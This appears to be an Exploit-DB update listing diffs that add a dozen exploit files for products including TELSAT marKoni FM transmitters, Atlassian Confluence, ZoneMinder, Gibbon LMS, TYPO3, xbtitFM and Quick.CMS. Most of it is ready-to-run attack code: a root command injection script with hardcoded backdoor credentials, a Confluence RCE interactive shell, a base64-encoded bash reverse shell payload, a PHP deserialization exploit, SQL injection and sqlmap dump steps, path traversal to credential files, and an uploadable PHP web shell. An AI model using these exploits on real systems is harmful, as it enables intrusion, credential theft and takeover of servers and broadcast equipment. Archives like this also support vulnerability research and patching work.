DB: 2024-03-19

13 changes to exploits/shellcodes/ghdb

TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure
TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password
TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection

Atlassian Confluence < 8.5.3 - Remote Code Execution

Backdrop CMS 1.23.0 - Stored XSS

Gibbon LMS < v26.0.00 - Authenticated RCE

Quick.CMS 6.7 - SQL Injection Login Bypass

TYPO3 11.5.24 - Path Traversal (Authenticated)

WEBIGniter v28.7.23 - Stored XSS

WordPress File Upload Plugin < 4.23.3 - Stored XSS

xbtitFM 4.1.18 - Multiple Vulnerabilities

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE

exploits/hardware/remote/51906.py

@@ -0,0 +1,193 @@
+#!/usr/bin/env python
+#
+#
+# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
+#
+#
+# Vendor: TELSAT Srl
+# Product web page: https://www.markoni.it
+# Affected version: Markoni-D (Compact) FM Transmitters
+#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
+#                   Markoni-A (Analogue Modulator) FM Transmitters
+#                   Firmware: 1.9.5
+#                             1.9.3
+#                             1.5.9
+#                             1.4.6
+#                             1.3.9
+#
+# Summary: Professional FM transmitters.
+#
+# Desc: The marKoni FM transmitters are susceptible to unauthenticated
+# remote code execution with root privileges. An attacker can exploit
+# a command injection vulnerability by manipulating the Email settings'
+# WAN IP info service, which utilizes the 'wget' module. This allows
+# the attacker to gain unauthorized access to the system with administrative
+# privileges by exploiting the 'url' parameter in the HTTP GET request
+# to ekafcgi.fcgi.
+#
+# -------------------------------------------------------------------------
+# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
+# Authentication successful for backdoor
+# Injecting command: whoami
+# Listening on port 9999
+# ('10.0.8.3', 47302) called back
+# Received: root
+# Housekeeping...
+# Zya and thanks for stopping by!
+#
+# [lqwrm@metalgear ~]#
+#
+# -------------------------------------------------------------------------
+#
+# Tested on: GNU/Linux 3.10.53 (armv7l)
+#            icorem6solox
+#            lighttpd/1.4.33
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2024-5808
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
+#
+#
+# 10.11.2023
+#
+
+from colorama import init, Fore
+import re,os,sys,requests
+import socket,threading
+from time import sleep
+init()
+
+def just_listen_to_me(lport, cstop):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lport))
+    s.listen(1)
+    print("Listening on port " + str(lport))
+    try:
+        conn, addr = s.accept()
+        print(addr, "called back")
+        cstop.set()
+    except socket.timeout:
+        print("Call return timeout\nCheck your ports")
+        conn.close()
+    while True:
+        try:
+            odg = conn.recv(1771).decode()
+            uam = re.search(r"User-Agent:\s*(.*)", odg)
+
+            if uam:
+                uav = uam.group(1)
+                print(f"Received: {uav}")
+                exit()
+            else:
+                print("No output for you")
+        except:
+            print("Housekeeping...")
+            exit()
+    s.close()
+
+def authenticate(ipaddr, option): #### Encrypted Shit ####_"
+    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
+    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
+    if option == "user": ##################################"
+        username = "\x75\x73\x65\x72" #####################"
+        password = "\x75\x73\x65\x72" #####################"
+    elif option == "admin": ###############################"
+        username = "\x61\x64\x6D\x69\x6E" #################"
+        password = "\x61\x64\x6D\x69\x6E" #################"
+    elif option == "backdoor": ############################"
+        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
+        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
+
+    authp = {
+        'username': username,
+        'password': password
+    }
+
+    resp = requests.get(auth_url + ep + "1", params=authp)
+
+    if "Set-Cookie" in resp.headers:
+        print(f"Authentication successful for {option}")
+        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
+        return auth_cookie
+    else:
+        print(f"Authentication failed for {option}.")
+        print("Try a different option.")
+        return None
+
+def execute(ipaddr, cookie, command, listen_ip):
+    print(f"Injecting command: {command}")
+    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
+    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
+    dva = f"http://{ipaddr}{ep}27"
+    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
+    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
+
+    headers = {"Cookie": cookie}
+
+    requests.get(eden, headers=headers)
+    sleep(2)
+    requests.get(dva, headers=headers)
+    sleep(2)
+    requests.get(tri, headers=headers)
+    sleep(1)
+    requests.get(clear, headers=headers)
+    print("Zya and thanks for stopping by!")
+    exit(0)
+
+def njaaah(text):
+    columns = os.get_terminal_size().columns
+    print(text.center(columns))
+
+zsl = "\033[91mWaddup!\033[0m" #Win64
+mrjox = f"""
+     ________
+   /          \\
+  /    ____    \\
+ |   /    0 \\   |
+ |   \\______/   |
+  \\____________/  {zsl}
+       | |
+      /   \\
+     /  O  \\
+    |    O  \\
+    |       \\
+    |        \\
+    |_________|
+        """
+
+if len(sys.argv) != 5:
+    print()
+    print("This is a PoC script for the marKoni transmitters 0day")
+    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
+    print("Option: 'user', 'admin', 'backdoor'")
+    print("Default listening port: 9999")
+    njaaah(mrjox)
+    exit()
+
+ipaddr = sys.argv[1]
+opt = sys.argv[2]
+listen_ip = sys.argv[3]
+command = sys.argv[4]
+
+opt_map = {
+    "admin"    : "admin",
+    "user"     : "user",
+    "backdoor" : "backdoor"
+}
+
+if opt in opt_map:
+    auth_cookie = authenticate(ipaddr, opt_map[opt])
+    if auth_cookie:
+        cstop = threading.Event()
+        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
+        lt.start()
+        execute(ipaddr, auth_cookie, command, listen_ip)
+        cstop.set()
+        lt.join()
+else:
+    print("Invalid option.")

exploits/hardware/remote/51907.txt

@@ -0,0 +1,57 @@
+TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account
+
+
+Vendor: TELSAT Srl
+Product web page: https://www.markoni.it
+Affected version: Markoni-D (Compact) FM Transmitters
+                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
+                  Markoni-A (Analogue Modulator) FM Transmitters
+                  Firmware: 1.9.5
+                            1.9.3
+                            1.5.9
+                            1.4.6
+                            1.3.9
+
+Summary: Professional FM transmitters.
+
+Desc: The transmitter has a hidden super administrative account 'factory'
+that has the hardcoded password 'inokram25' that allows full access to
+the web management interface configuration. The factory account is not
+visible in the users page of the application and the password cannot be
+changed through any normal operation of the device. The backdoor lies in
+the /js_files/LogIn_local.js script file. Attackers could exploit this
+vulnerability by logging in using the backdoor credentials for the web
+panel gaining also additional functionalities including: unit configuration,
+parameter modification, EEPROM overwrite, clearing DB, and factory log
+modification.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+           icorem6solox
+           lighttpd/1.4.33
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2024-5809
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php
+CWE ID: 912
+CWE URL: https://cwe.mitre.org/data/definitions/912.html
+
+
+10.11.2023
+
+--
+
+
+The credentials can be seen in the auto_login() JS function in the
+unprotected /js_files/LogIn_local.js file:
+
+$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"
+
+function auto_login() {     // @mod1
+    var username = "factory";
+    var password = "inokram25";
+$

exploits/hardware/remote/51908.txt

@@ -0,0 +1,54 @@
+TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
+
+
+Vendor: TELSAT Srl
+Product web page: https://www.markoni.it
+Affected version: Markoni-D (Compact) FM Transmitters
+                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
+                  Markoni-A (Analogue Modulator) FM Transmitters
+                  Firmware: 1.9.5
+                            1.9.3
+                            1.5.9
+                            1.4.6
+                            1.3.9
+
+Summary: Professional FM transmitters.
+
+Desc: Unauthorized user could exploit this vulnerability to change
+his/her password, potentially gaining unauthorized access to sensitive
+information or performing actions beyond her/his designated permissions.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+           icorem6solox
+           lighttpd/1.4.33
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2024-5811
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
+
+
+10.11.2023
+
+--
+
+
+PoC request of a user changing his own password.
+Only admin can edit users. No permissions or Cookie check.
+
+$ curl -s -H "Cookie: name=user-1702119917" \
+http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t
+
+HTTP/1.1 200 OK
+Content-type: text/html
+Cache-control: no-cache
+Set-Cookie: name=user-1702119917; max-age=315360000
+Transfer-Encoding: chunked
+Date: Sat, 9 Dec 2023 11:05:17 GMT
+Server: lighttpd/1.4.33
+
+oc=4&resp=0

exploits/multiple/webapps/51904.py

@@ -0,0 +1,81 @@
+# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
+# Date: 25/1/2024
+# Exploit Author: MaanVader
+# Vendor Homepage: https://www.atlassian.com/software/confluence
+# Software Link: https://www.atlassian.com/software/confluence
+# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
+# Tested on: 8.5.3
+# CVE : CVE-2023-22527
+
+
+
+import requests
+import argparse
+import urllib3
+from prompt_toolkit import PromptSession
+from prompt_toolkit.formatted_text import HTML
+from rich.console import Console
+
+# Disable SSL warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Argument parsing
+parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
+parser.add_argument("-u", "--url", help="Single Confluence Server URL")
+parser.add_argument("-f", "--file", help="File containing list of IP addresses")
+parser.add_argument("-c", "--command", help="Command to Execute")
+parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
+args = parser.parse_args()
+
+# Rich console for formatted output
+console = Console()
+
+# Function to send payload
+def send_payload(url, command):
+    headers = {
+        'Connection': 'close',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
+                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
+    headers['Content-Length'] = str(len(payload))
+
+    full_url = f"{url}/template/aui/text-inline.vm"
+    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
+    return response.text.split('<!DOCTYPE html>')[0].strip()
+
+# Interactive shell function
+def interactive_shell(url):
+    session = PromptSession()
+    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
+    while True:
+        try:
+            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
+            if cmd.lower() in ["exit", "quit"]:
+                break
+            response = send_payload(url, cmd)
+            console.print(response)
+        except KeyboardInterrupt:
+            break
+        except Exception as e:
+            console.print(f"[bold red]Error: {e}[/bold red]")
+            break
+
+# Process file function
+def process_file(file_path):
+    with open(file_path, 'r') as file:
+        for line in file:
+            ip = line.strip()
+            url = f"http://{ip}:8090"
+            console.print(f"Processing {url}")
+            print(send_payload(url, args.command))
+
+# Main execution logic
+if args.shell and args.url:
+    interactive_shell(args.url)
+elif args.url and args.command:
+    print(send_payload(args.url, args.command))
+elif args.file and args.command:
+    process_file(args.file)
+else:
+    print("Error: Please provide a valid URL and a command or use the interactive shell option.")

exploits/php/webapps/51899.txt

@@ -0,0 +1,17 @@
+Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)
+Date: 18 December 2023
+Exploit Author: Faiyaz Ahmad
+Vendor Homepage: https://wordpress.com/
+Version: 4.23.3
+CVE : CVE 2023-4811
+
+Proof Of Concept:
+
+1. Login to the wordpress account
+
+2. Add the following shortcode to a post in "File Upload Plugin":
+
+[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]
+
+3. Upload any file on the resulting post.
+4. After the upload completes, you will see the XSS alert in the browser.

exploits/php/webapps/51900.txt

@@ -0,0 +1,15 @@
+## Title: WEBIGniter v28.7.23 XSS
+## Author: RedTeamer IT Security, Mesut Cetin
+## Date: 09/04/2023
+## Vendor: https://webigniter.net/
+## Software: https://webigniter.net/demo
+## Reference: https://portswigger.net/web-security/cross-site-scripting/stored
+
+## Description:
+During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks.
+
+## PoC
+To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded within an image tag like this: <img src onerror="prompt(8)">, can be executed when the user navigates to the "users" page under their profile.
+
+## Mitigation
+To mitigate this risk, the "your_name" parameter should be subjected to rigorous input validation and encoding to ensure that all user input is sanitized and rendered harmless.

exploits/php/webapps/51901.txt

@@ -0,0 +1,25 @@
+# Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated)
+# Date: Apr 9, 2023
+# Exploit Author: Saeed reza Zamanian
+# Software Link: https://get.typo3.org/release-notes/11.5.24
+# Version: 11.5.24
+# Tested on: Kali 2022.3
+# CVE : CVE-2023-30451
+
+
+ In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel),
+ to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through :
+ POST /typo3/record/edit with ../../../ and the parameter
+  data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].
+
+-----------------------------------------------------
+To exploit this vulnerability, follow these steps:
+
+1. Log in to the administrator panel.
+2. Navigate to 'file' > 'Filelist' section.
+3. Right-click on a file storage and select 'New.'
+4. Set the base URI to "../../../" and save.
+
+After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server.
+
+To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.

exploits/php/webapps/51902.py

@@ -0,0 +1,60 @@
+import re
+import requests
+from bs4 import BeautifulSoup
+import argparse
+import base64
+
+# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
+# Date: 12 December 2023
+# Discovered by : @Unblvr1
+# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
+# Vendor Homepage: https://zoneminder.com/
+# Software Link: https://github.com/ZoneMinder/zoneminder
+# Version: prior to 1.36.33 and 1.37.33
+# Tested on: Arch Linux, Kali Linux
+# CVE : CVE-2023-26035
+# Github Link : https://github.com/rvizx/CVE-2023-26035
+
+
+class ZoneMinderExploit:
+    def __init__(self, target_uri):
+        self.target_uri = target_uri
+        self.csrf_magic = None
+
+    def fetch_csrf_token(self):
+        print("[>] fetching csrt token")
+        response = requests.get(self.target_uri)
+        self.csrf_magic = self.get_csrf_magic(response)
+        if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):
+            print(f"[>] recieved the token: {self.csrf_magic}")
+            return True
+        print("[!] unable to fetch or parse token.")
+        return False
+
+    def get_csrf_magic(self, response):
+        return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)
+
+    def execute_command(self, cmd):
+        print("[>] sending payload..")
+        data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}
+        response = requests.post(f"{self.target_uri}/index.php", data=data)
+        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")
+
+    def exploit(self, payload):
+        if self.fetch_csrf_token():
+            print(f"[>] executing...")
+            self.execute_command(payload)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
+    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
+    parser.add_argument('-p', '--port', required=True, help='port')
+    args = parser.parse_args()
+
+    # generating the payload
+    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"
+    ps2 = base64.b64encode(ps1.encode()).decode()
+    payload = f"echo {ps2} | base64 -d | /bin/bash"
+
+    ZoneMinderExploit(args.target_url).exploit(payload)

exploits/php/webapps/51903.py

@@ -0,0 +1,129 @@
+# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on
+the v26.0.00 version
+# Date: 22.01.2024
+# Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat
+Guliev,Islam Rzayev )
+# Vendor Homepage: https://gibbonedu.org/
+# Software Link: https://github.com/GibbonEdu/core
+# Version: v26.0.00
+# Tested on: Ubuntu 22.0
+# CVE : CVE-2024-24725
+
+import requests
+import re
+import sys
+import base64
+import urllib.parse
+
+
+def login(target_host, target_port,email,password):
+     url = f'http://{target_host}:{target_port}/login.php?timeout=true'
+     headers = {"Content-Type": "multipart/form-data;
+boundary=---------------------------174475955731268836341556039466"}
+     data =
+f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
+form-data;
+name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
+     r = requests.post(url, headers=headers, data=data,
+allow_redirects=False)
+     Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
+     if Session_Cookie[4] is not None and '/index.php' in
+str(r.headers['Location']):
+         print("[X] Login successful!")
+
+     return Session_Cookie[4]
+
+
+
+def generate_payload(command):
+
+     # Given base64-encoded string
+     ### Actual Payload:
+     ###
+a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}
+     base64_encoded_string =
+'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9'
+
+     command_size = len(command)
+
+     # Decode base64
+     decoded_bytes = base64.b64decode(base64_encoded_string)
+     decoded_string = decoded_bytes.decode('utf-8')
+
+     # URL decode
+     payload = urllib.parse.unquote(decoded_string)
+     # Replace placeholders in the decoded string
+     payload = payload.replace('COMMAND_SIZE', str(command_size))
+     payload = payload.replace('COMMAND', command)
+     print("[X] Payload Generated!")
+     return payload
+
+
+
+def rce(cookie, target_host, target_port, command):
+     url =
+f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'
+     headers = {"Content-Type": "multipart/form-data;
+boundary=---------------------------104550429928543086952438317710","Cookie":
+cookie}
+     payload = generate_payload(command)
+     data =
+f'-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data; name="address"\r\n\r\n/modules/System
+Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data; name="csvData"\r\n\r\n"External Assessment","Assessment
+Date","Student","Field Name Category","Field
+Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:
+form-data;
+name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
+
+     r = requests.post(url, headers=headers, data=data,
+allow_redirects=False)
+     print("[X] Request sent!")
+
+     start_index = r.text.find("<h2>Step 4 - Live Run</h2>")
+     end_index = r.text.find("<div class", start_index)
+     result = r.text[start_index+26:end_index].strip()
+     if result != '':
+         print("[X] Execution result: \n"+result)
+     else:
+         print("[X] Command failed or did not output anything.")
+
+     with open("pocresponse.html", "wb") as f:
+         f.write(r.content)
+
+if __name__ == '__main__':
+     if len(sys.argv) != 6:
+         print("[X] Usage: script.py <target_host> <target_port> <email>
+<password> <command>")
+         sys.exit(1)
+     cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4])
+     rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])

exploits/php/webapps/51905.txt

@@ -0,0 +1,14 @@
+# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field
+# Date: 2023-08-21
+# Exploit Author: Sinem Şahin
+# Vendor Homepage: https://backdropcms.org/
+# Version: 1.23.0
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Go to the following url. => http://(HOST)/backdrop/node/add/post
+2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from.
+3- Press "Save" button.
+
+XSS Payload ==> "<script>alert("post_body")</script>

exploits/php/webapps/51909.txt

@@ -0,0 +1,82 @@
+# Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities
+# Date: 22-01-2024
+# Vendor Homepage: https://xbtitfm.eu
+# Affected versions: 4.1.18 and prior
+# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.
+The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.
+Looking at the state and the age of the codebase there are probably more, but who cares anyway...
+
+[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]
+
+Some examples:
+Get DB name:
+/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABA SE() AS NCHAR),0)),1,100))))
+
+Get DB user:
+/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURREN T_USER() AS NCHAR),0)),1,100))))
+
+Get password hash of any user (might need some modification to work on different instances):
+/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a ) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FL OOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);
+
+Automate it with sqlmap to dump the database.
+1) Get DB name
+sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db
+2) Get table names
+sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables
+3) Dump users table (usually called xbtit_users)
+sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump
+4) Crack hashes (usually unsalted MD5, yey!)
+hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt
+Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one)
+
+[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]
+
+1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)
+https[:]//example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reve als_the_real_path
+
+2) Read files that contain database credentials.
+https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php
+https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php
+
+Or any other system file you want.
+https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd
+
+3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured
+https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php
+If so, go to https[:]//example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.
+
+[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]
+
+If that wasn't enough already and you want RCE, visit https[:]//example.xyz/index.php?page=file_hosting
+If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.
+Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enough to bypass the filetype checks.
+A silly countermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.
+
+Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"
+Content-Type: image/gif
+
+GIF89a;
+<html>
+<body>
+<form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+
+<pre>
+<?pHp
+
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+
+</pre>
+</body>
+</html>
+
+The web shell will then be uploaded here:
+https[:]//example.xyz/file_hosting/definately_not_a_shell.php
+
+If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.

exploits/php/webapps/51910.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
+# Google Dork: N/A
+# Date: 02-03-2024
+# Exploit Author: ./H4X.Forensics - Diyar
+# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
+# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
+# Version: 6.7
+# Tested on: Windows
+# CVE : N/A
+
+How to exploit :
+
+*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
+*--> Enter any Email like : root@root.com<mailto:root@root.com>
+*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
+*--> Tick the Checkbox
+*--> Press Login
+*--> Congratz!
+
+ *--> SQL Injection Authentication Bypass Payload : ' or '1'='1
+
+*--> Payloads Can be use :
+
+' or '1'='1
+' or ''='
+' or 1]%00
+' or /* or '
+' or "a" or '
+' or 1 or '
+' or true() or '

files_exploits.csv

@@ -3950,6 +3950,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
